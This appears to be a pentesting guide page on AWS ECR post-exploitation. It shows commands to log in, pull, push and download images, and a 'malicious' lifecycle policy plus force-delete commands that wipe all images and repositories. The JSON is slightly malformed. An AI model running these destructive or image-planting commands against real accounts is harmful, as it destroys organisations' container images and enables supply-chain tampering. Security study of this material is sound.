AWS - ECR Post Exploitation
Reading time: 4 minutes
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Login, Pull & Push
# Docker login into ecr
## For public repo (always use us-east-1)
aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin<random-id>
## For private repo
aws ecr get-login-password --profile <profile_name> --region <region> | docker login --username AWS --password-stdin <account_id>.dkr.ecr.<region>
## If you need to acces an image from a repo if a different account, in <account_id> set the account number of the other account
# Download
docker pull <account_id>.dkr.ecr.<region><repo_name>:latest
## If you still have the error "Requested image not found"
## It might be because the tag "latest" doesn't exit
## Get valid tags with:
TOKEN=$(aws --profile <profile> ecr get-authorization-token --output text --query 'authorizationData[].authorizationToken')
curl -i -H "Authorization: Basic $TOKEN" https://<account_id>.dkr.ecr.<region><img_name>/tags/list
# Inspect the image
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
docker inspect <account id>.dkr.ecr.<region><image>:<tag> # Inspect the image indicating the URL
# Upload (example uploading purplepanda with tag latest)
docker tag purplepanda:latest <account_id>.dkr.ecr.<region>
docker push <account_id>.dkr.ecr.<region>
# Downloading without Docker
# List digests
aws ecr batch-get-image --repository-name level2 \
--registry-id 653711331788 \
--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
## Download a digest
aws ecr get-download-url-for-layer \
--repository-name level2 \
--registry-id 653711331788 \
--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
After downloading the images you should check them for sensitive info:
| ecr:DeleteRepository
| ecr-public:DeleteRepository
| ecr:BatchDeleteImage
| ecr-public:BatchDeleteImage
An attacker with any of these permissions can create or modify a lifecycle policy to delete all images in the repository and then delete the entire ECR repository. This would result in the loss of all container images stored in the repository.
bashCopy code# Create a JSON file with the malicious lifecycle policy
echo '{
"rules": [
"rulePriority": 1,
"description": "Delete all images",
"selection": {
"tagStatus": "any",
"countType": "imageCountMoreThan",
"countNumber": 0
"action": {
"type": "expire"
}' > malicious_policy.json
# Apply the malicious lifecycle policy to the ECR repository
aws ecr put-lifecycle-policy --repository-name your-ecr-repo-name --lifecycle-policy-text file://malicious_policy.json
# Delete the ECR repository
aws ecr delete-repository --repository-name your-ecr-repo-name --force
# Delete the ECR public repository
aws ecr-public delete-repository --repository-name your-ecr-repo-name --force
# Delete multiple images from the ECR repository
aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0
# Delete multiple images from the ECR public repository
aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0
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